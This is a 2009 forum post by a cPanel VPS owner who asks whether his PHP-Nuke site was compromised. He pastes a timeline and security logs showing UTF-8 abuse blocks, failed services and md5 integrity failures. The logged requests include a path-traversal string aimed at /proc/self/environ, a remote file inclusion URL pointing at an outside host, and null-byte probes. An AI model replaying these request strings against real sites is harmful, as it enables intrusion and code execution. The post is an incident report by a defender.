The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Have I been hacked?

Discussion in 'General Discussion' started by mattb37, May 18, 2009.

  1. mattb37

    mattb37 Registered

    Joined:
    May 18, 2009
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    Services fail after UTF8 Abuse attack

    Hi, I have been a little worried about the security on my cPanel VPS, at my previous host my account was hacked and a phishing scam was launched from it. Now I am fully independent I don’t want the same thing happening again. Sorry for the lengthy post in advance but this is probably the best way I can get my situation across.

    The website in question runs phpnuke platinum which I know is very vulnerable to attacks, I have been trying to prevent the daily XSS attacks I get by disabling "allow_url_fopen" in php but I have still received notifications that remote exploits were being ran.

    Here is what I have had reported from lfd today.

    18:15 - LFD blocks an IP address for running UTF8 Encoding Abuse Attacks. IP address logged (85.214.145.133) as originating from Germany, later attacks I have had logged came from the same IP addresses range prompting my to terminate all unnecessary services.

    Code:
    [Mon May 18 18:10:00 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "39"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWaE6B-DQAAHb6fwsAAAAI"]
    
    [Mon May 18 18:10:03 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:year. [offset "41"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWa06B-DQAAA4kF2kAAAAA"]
    
    [Mon May 18 18:14:32 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS_NAMES:nuke\\xa7bb\\xa7root\\xa7path. [offset "4"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "yournovavets.com"] [uri "/modules/Forums/favorites.php"] [unique_id "ShGXeE6B-DQAAHb7f94AAAAL"]
    
    [Mon May 18 18:14:45 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:sid. [offset "36"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXhU6B-DQAAA4kF2sAAAAA"]
    
    [Mon May 18 18:14:51 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "37"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXi06B-DQAAC0VTA0AAAAJ"]
    
    19:18 - spamd, sshd & named fail.
    19:30 - PHP nuke fusion reports SQL exploit, IP address 85.214.73.46 banned by nuke.

    Code:
    Cause: Breach attempt on file admin.php or attempted to use SQL exploit Url String: /arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
    20:19 - ftpd, mysql failed
    20:26 - XSS attack on php nuke cms

    Code:
    The user Anonymous was on the page admin.php on your site NovaVets Ip is: 85.214.73.46 User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
    Date: 2009.05.18 21:26:19
    Used Url: /admin.php?include_path=http:/www.fmf2004.hu/buggsbunny??
    
    20:38 - System integrity check failed on LFD and CSF (md5)

    Code:
    The following list of files have FAILED the md5sum comparison test. This means that the file has been changed in some way. This could be a result of an OS update or application upgrade. If the change is unexpected it should be investigated:
    
    /usr/sbin/csf: FAILED
    /etc/init.d/csf: FAILED
    /etc/init.d/lfd: FAILED
    
    20:19 - ftpd failed

    20:43 - I logged in via ssh, terminated unrequired services (httpd, ftp, pop, exim, named, imap & cpservd), backed up home directory to an external server, rebooted system. Upon system rebooting CSF would not start and I had to rebuild the csf conf.

    22:19 - enabled all services terminated at 20:43, rebooted system and it seems to be running fine.

    My mod security log has been showing 127.0.0.1 as requesting pages with the following get statements:
    • /%00/ HTTP/1.0
    • /index.jsp%00x HTTP/1.0
    • /ext.ini.%00.txt HTTP/1.0
    • /web-console/ServerInfo.jsp%00 HTTP/1.0

    Could the above list be an exploit being ran on the system?

    Regarding the XSS attacks and me failing to disable the "allow_url_fopen" how would I be best to proceed in disabling this function? I have tried and failed to find a solution over the past week or so.

    What can I do about the UTF8 abuse, is there something I can run to check the security on my VPS and what, if any damage could have been done. I am running CSF but am very restricted as to the amount of rules I can apply, keep hitting the 191/200 numiptent error. I might move all my web services to a dedicated server which I know would fix this and allow me to run a much larger set of rules.

    With everything above is it likely that my system has been compromised and I should be thinking about rebuilding various parts of it, particularly the services which failed the md5 check. I have changed passwords but I get the feeling that might not be enough with processes being ran locally.

    Thanks for reading this far and any replies would be much appreciated.

    Matt.
     
    #1 mattb37, May 18, 2009
    Last edited: May 18, 2009
Loading...

Share This Page